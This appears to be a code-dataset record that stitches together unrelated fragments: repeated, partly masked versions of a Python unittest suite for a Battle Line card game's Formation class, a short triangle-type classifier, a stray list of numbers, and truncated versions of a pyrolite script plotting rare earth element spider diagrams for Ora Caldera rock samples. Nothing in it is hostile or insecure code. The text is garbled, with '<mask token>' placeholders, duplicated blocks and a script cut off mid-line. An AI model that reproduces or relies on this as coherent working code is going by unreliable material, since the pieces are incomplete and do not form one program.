def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(2, 'R'), (2, 'G'), (2, 'B')]))
)
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(1, 'Y'), (1, 'R'), (1, 'B')]))
)
self.assertFalse(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(2, 'P'), (2, 'G'), (2, 'O')]))
)
<mask token>
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (5, 'G'), (2, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (6, 'G'), (2, 'G')]))
)
<mask token>
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(3, 'G'), (1, 'G'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'Y'), (2, 'B'), (3, 'B')]))
)
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, 'G'), (3, 'B'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (9, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(1, 'G'), (1, 'R'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'P'), (8, 'P'), (3, 'O')]))
)
| <mask token>
class TestFormation(unittest.TestCase):
<mask token>
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y'),
(3, 'R'), (5, 'G')])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, 'R'), (9, 'Y'), (8, 'R')])
self.assertEquals((8, 9, 10), formation.get_numbers())
def test_can_get_formation_colors_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(('R', 'Y', 'R'), formation.get_colors())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(('G', 'Y', 'R'), formation.get_colors())
def test_can_get_max_number(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(3, formation.get_max_number())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(10, formation.get_max_number())
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'R'), (2, 'R'), (3,
'R')])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (4,
'G')])))
self.assertFalse(Formation([(5, 'R'), (1, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'B'), (3, 'B'), (4,
'B')])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'G')])))
<mask token>
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'B')])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'P'), (1, 'B'), (1,
'O')])))
self.assertFalse(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'P'), (2, 'B'), (2,
'O')])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, 'R'), (2, 'R'), (5, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
self.assertFalse(Formation([(6, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (3,
'G')])))
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(4, 'B'), (2, 'B'), (3,
'G')])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, 'R'), (4, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (4, 'G'), (3,
'B')])))
self.assertFalse(Formation([(1, 'R'), (2, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(4, 'G'), (2, 'G'), (3,
'B')])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(2, 'R'), (2, 'G'), (2, 'B')]))
)
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(1, 'Y'), (1, 'R'), (1, 'B')]))
)
self.assertFalse(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(2, 'P'), (2, 'G'), (2, 'O')]))
)
<mask token>
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (5, 'G'), (2, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (6, 'G'), (2, 'G')]))
)
def test_greater_than_check_battalion_and_skirmish(self):
self.assertTrue(Formation([(3, 'G'), (6, 'G'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (3, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(3, 'G'), (1, 'G'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'Y'), (2, 'B'), (3, 'B')]))
)
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, 'G'), (3, 'B'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (9, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(1, 'G'), (1, 'R'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'P'), (8, 'P'), (3, 'O')]))
)
| <mask token>
class TestFormation(unittest.TestCase):
def test_formation_with_less_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y')])
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y'),
(3, 'R'), (5, 'G')])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, 'R'), (9, 'Y'), (8, 'R')])
self.assertEquals((8, 9, 10), formation.get_numbers())
def test_can_get_formation_colors_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(('R', 'Y', 'R'), formation.get_colors())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(('G', 'Y', 'R'), formation.get_colors())
def test_can_get_max_number(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(3, formation.get_max_number())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(10, formation.get_max_number())
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'R'), (2, 'R'), (3,
'R')])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (4,
'G')])))
self.assertFalse(Formation([(5, 'R'), (1, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'B'), (3, 'B'), (4,
'B')])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'G')])))
<mask token>
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'B')])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'P'), (1, 'B'), (1,
'O')])))
self.assertFalse(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'P'), (2, 'B'), (2,
'O')])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, 'R'), (2, 'R'), (5, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
self.assertFalse(Formation([(6, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (3,
'G')])))
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(4, 'B'), (2, 'B'), (3,
'G')])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, 'R'), (4, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (4, 'G'), (3,
'B')])))
self.assertFalse(Formation([(1, 'R'), (2, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(4, 'G'), (2, 'G'), (3,
'B')])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(2, 'R'), (2, 'G'), (2, 'B')]))
)
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(1, 'Y'), (1, 'R'), (1, 'B')]))
)
self.assertFalse(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(2, 'P'), (2, 'G'), (2, 'O')]))
)
<mask token>
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (5, 'G'), (2, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (6, 'G'), (2, 'G')]))
)
def test_greater_than_check_battalion_and_skirmish(self):
self.assertTrue(Formation([(3, 'G'), (6, 'G'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (3, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(3, 'G'), (1, 'G'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'Y'), (2, 'B'), (3, 'B')]))
)
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, 'G'), (3, 'B'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (9, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(1, 'G'), (1, 'R'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'P'), (8, 'P'), (3, 'O')]))
)
| import unittest
from battleline.model.Formation import Formation, FormationInvalidError
class TestFormation(unittest.TestCase):
def test_formation_with_less_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y')])
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y'),
(3, 'R'), (5, 'G')])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, 'R'), (9, 'Y'), (8, 'R')])
self.assertEquals((8, 9, 10), formation.get_numbers())
def test_can_get_formation_colors_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(('R', 'Y', 'R'), formation.get_colors())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(('G', 'Y', 'R'), formation.get_colors())
def test_can_get_max_number(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(3, formation.get_max_number())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(10, formation.get_max_number())
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'R'), (2, 'R'), (3,
'R')])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (4,
'G')])))
self.assertFalse(Formation([(5, 'R'), (1, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'B'), (3, 'B'), (4,
'B')])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'G')])))
def test_formation_equality_with_wedge_and_battalion(self):
self.assertFalse(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'G'), (1, 'G'), (3,
'G')])))
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'B')])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'P'), (1, 'B'), (1,
'O')])))
self.assertFalse(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'P'), (2, 'B'), (2,
'O')])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, 'R'), (2, 'R'), (5, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
self.assertFalse(Formation([(6, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (3,
'G')])))
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(4, 'B'), (2, 'B'), (3,
'G')])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, 'R'), (4, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (4, 'G'), (3,
'B')])))
self.assertFalse(Formation([(1, 'R'), (2, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(4, 'G'), (2, 'G'), (3,
'B')])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(2, 'R'), (2, 'G'), (2, 'B')]))
)
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(1, 'Y'), (1, 'R'), (1, 'B')]))
)
self.assertFalse(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(2, 'P'), (2, 'G'), (2, 'O')]))
)
def test_greater_than_check_phalanx_and_battalion(self):
self.assertTrue(Formation([(3, 'Y'), (3, 'R'), (3, 'B')]).
is_greater_strength_than(Formation([(1, 'G'), (3, 'G'), (6, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (6, 'G')]).
is_greater_strength_than(Formation([(3, 'Y'), (3, 'R'), (3, 'B')]))
)
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (5, 'G'), (2, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (6, 'G'), (2, 'G')]))
)
def test_greater_than_check_battalion_and_skirmish(self):
self.assertTrue(Formation([(3, 'G'), (6, 'G'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (3, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(3, 'G'), (1, 'G'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'Y'), (2, 'B'), (3, 'B')]))
)
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, 'G'), (3, 'B'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (9, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(1, 'G'), (1, 'R'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'P'), (8, 'P'), (3, 'O')]))
)
| import unittest
from battleline.model.Formation import Formation, FormationInvalidError
class TestFormation(unittest.TestCase):
def test_formation_with_less_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(
FormationInvalidError, "Formation must have 3 cards", Formation, [(1, "R"), (2, "Y")])
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError, "Formation must have 3 cards", Formation, [
(1, "R"), (2, "Y"), (3, "R"), (5, "G")])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, "R"), (3, "Y"), (2, "R")])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, "R"), (9, "Y"), (8, "R")])
self.assertEquals((8, 9, 10), formation.get_numbers())
def test_can_get_formation_colors_in_sorted_fashion(self):
formation = Formation([(1, "R"), (3, "Y"), (2, "R")])
self.assertEquals(("R", "Y", "R"), formation.get_colors())
formation = Formation([(10, "G"), (9, "Y"), (8, "R")])
self.assertEquals(("G", "Y", "R"), formation.get_colors())
def test_can_get_max_number(self):
formation = Formation([(1, "R"), (3, "Y"), (2, "R")])
self.assertEquals(3, formation.get_max_number())
formation = Formation([(10, "G"), (9, "Y"), (8, "R")])
self.assertEquals(10, formation.get_max_number())
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "R"), (2, "R"), (3, "R")])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "B"), (2, "B"), (4, "G")])))
self.assertFalse(Formation([(5, "R"), (1, "R"), (3, "Y")]).is_equivalent_in_strength(
Formation([(2, "B"), (3, "B"), (4, "B")])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "G"), (2, "G"), (3, "G")])))
def test_formation_equality_with_wedge_and_battalion(self):
self.assertFalse(Formation([(4, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(5, "G"), (1, "G"), (3, "G")])))
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "G"), (2, "G"), (3, "B")])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, "R"), (1, "G"), (1, "Y")]).is_equivalent_in_strength(
Formation([(1, "P"), (1, "B"), (1, "O")])))
self.assertFalse(Formation([(1, "R"), (1, "G"), (1, "Y")]).is_equivalent_in_strength(
Formation([(2, "P"), (2, "B"), (2, "O")])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, "R"), (2, "R"), (5, "R")]).is_equivalent_in_strength(
Formation([(5, "B"), (2, "B"), (3, "B")])))
self.assertFalse(Formation([(6, "R"), (2, "R"), (3, "R")]).is_equivalent_in_strength(
Formation([(5, "B"), (2, "B"), (3, "B")])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, "R"), (2, "R"), (3, "Y")]).is_equivalent_in_strength(
Formation([(1, "B"), (2, "B"), (3, "G")])))
self.assertFalse(Formation([(1, "R"), (2, "R"), (3, "Y")]).is_equivalent_in_strength(
Formation([(4, "B"), (2, "B"), (3, "G")])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, "R"), (4, "Y"), (3, "R")]).is_equivalent_in_strength(
Formation([(1, "G"), (4, "G"), (3, "B")])))
self.assertFalse(Formation([(1, "R"), (2, "Y"), (3, "R")]).is_equivalent_in_strength(
Formation([(4, "G"), (2, "G"), (3, "B")])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, "R"), (2, "R"), (3, "R")]).is_greater_strength_than(
Formation([(1, "R"), (2, "R"), (3, "R")])))
self.assertFalse(Formation([(1, "R"), (2, "R"), (3, "R")]).is_greater_strength_than(
Formation([(1, "R"), (2, "R"), (3, "R")])))
def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, "R"), (2, "R"), (3, "R")]).is_greater_strength_than(
Formation([(2, "R"), (2, "G"), (2, "B")])))
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, "Y"), (2, "R"), (2, "B")]).is_greater_strength_than(
Formation([(1, "Y"), (1, "R"), (1, "B")])))
self.assertFalse(Formation([(2, "Y"), (2, "R"), (2, "B")]).is_greater_strength_than(
Formation([(2, "P"), (2, "G"), (2, "O")])))
def test_greater_than_check_phalanx_and_battalion(self):
self.assertTrue(Formation([(3, "Y"), (3, "R"), (3, "B")]).is_greater_strength_than(
Formation([(1, "G"), (3, "G"), (6, "G")])))
self.assertFalse(Formation([(1, "G"), (3, "G"), (6, "G")]).is_greater_strength_than(
Formation([(3, "Y"), (3, "R"), (3, "B")])))
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, "G"), (3, "G"), (8, "G")]).is_greater_strength_than(
Formation([(4, "G"), (5, "G"), (2, "G")])))
self.assertFalse(Formation([(1, "G"), (3, "G"), (8, "G")]).is_greater_strength_than(
Formation([(4, "G"), (6, "G"), (2, "G")])))
def test_greater_than_check_battalion_and_skirmish(self):
self.assertTrue(Formation([(3, "G"), (6, "G"), (2, "G")]).is_greater_strength_than(
Formation([(4, "G"), (3, "G"), (5, "B")])))
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, "G"), (2, "G"), (3, "Y")]).is_greater_strength_than(
Formation([(3, "G"), (1, "G"), (2, "Y")])))
self.assertFalse(Formation([(4, "G"), (2, "G"), (3, "Y")]).is_greater_strength_than(
Formation([(4, "Y"), (2, "B"), (3, "B")])))
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, "G"), (3, "B"), (2, "G")]).is_greater_strength_than(
Formation([(4, "G"), (9, "G"), (5, "B")])))
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, "G"), (8, "G"), (3, "Y")]).is_greater_strength_than(
Formation([(1, "G"), (1, "R"), (2, "Y")])))
self.assertFalse(Formation([(4, "G"), (8, "G"), (3, "Y")]).is_greater_strength_than(
Formation([(4, "P"), (8, "P"), (3, "O")])))
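# (editor's note) assertRaisesRegexp and assertEquals are the deprecated
# unittest aliases for assertRaisesRegex and assertEqual; the old aliases were
# removed in Python 3.12.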
| [
18,
21,
22,
25,
26
] |
1,649 | 81233eb12b8447d017b31f200ab7902dcce45496 | a = float(input('Enter a value: '))
b = float(input('Enter another value: '))
c = float(input('Enter one more value: '))
if a == b == c:
    print('The numbers entered form an EQUILATERAL triangle.')
elif a == b or b == c or a == c:
    print('The numbers entered form an ISOSCELES triangle.')
else:
    print('The numbers entered form a SCALENE triangle.') | null | null | null | null | [
0
] |
1,650 | f6fee18898636ad6b0dc6d96d28dead4e09b8035 | <mask token>
| <mask token>
sns.set()
<mask token>
MG.pyroplot.spider(color='green', alpha=0.5, mode='fill')
VCCR.pyroplot.spider(color='red', alpha=0.5, mode='fill')
FG.pyroplot.spider(color='purple', alpha=0.5, mode='fill')
FGCP.pyroplot.spider(color='blue', alpha=0.5, mode='fill')
sns.set_style('darkgrid')
plt.show()
| <mask token>
sns.set()
<mask token>
df = pd.read_csv(
'/users/gennachiaro/Documents/Vanderbilt/Research/Ora Caldera/Trace Elements/Rare Earth Elements/REE_Mean_Normalized.csv'
, index_col=0)
MG = df.loc[['ORA-2A-001', 'ORA-2A-005', 'ORA-2A-018', 'ORA-2A-031',
'ORA-2A-032', 'ORA-2A-035', 'ORA-2A-040']]
VCCR = df.loc[['ORA-5B-402', 'ORA-5B-404A', 'ORA-5B-404B', 'ORA-5B-405',
'ORA-5B-406', 'ORA-5B-407', 'ORA-5B-408-SITE2', 'ORA-5B-408-SITE7',
'ORA-5B-408-SITE8', 'ORA-5B-409', 'ORA-5B-411', 'ORA-5B-412A-CG',
'ORA-5B-412B-CG', 'ORA-5B-413', 'ORA-5B-414-CG', 'ORA-5B-415',
'ORA-5B-416', 'ORA-5B-417']]
FG = df.loc[['ORA-5B-410', 'ORA-5B-412A-FG', 'ORA-5B-412B-FG', 'ORA-5B-414-FG']
]
FGCP = df.loc[['ORA-2A-002_Type1', 'ORA-2A-002_Type2', 'ORA-2A-002',
'ORA-2A-003', 'ORA-2A-016_Type1', 'ORA-2A-016-Type2',
'ORA-2A-016-Type3', 'ORA-2A-016-Type4', 'ORA-2A-023', 'ORA-2A-024',
'MINGLED1-ORA-2A-024', 'MINGLED2-ORA-2A-024', 'MINGLED3-ORA-2A-024']]
MG.pyroplot.spider(color='green', alpha=0.5, mode='fill')
VCCR.pyroplot.spider(color='red', alpha=0.5, mode='fill')
FG.pyroplot.spider(color='purple', alpha=0.5, mode='fill')
FGCP.pyroplot.spider(color='blue', alpha=0.5, mode='fill')
sns.set_style('darkgrid')
plt.show()
| <mask token>
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
import pyrolite.plot
from pyrolite.plot.spider import spider
df = pd.read_csv(
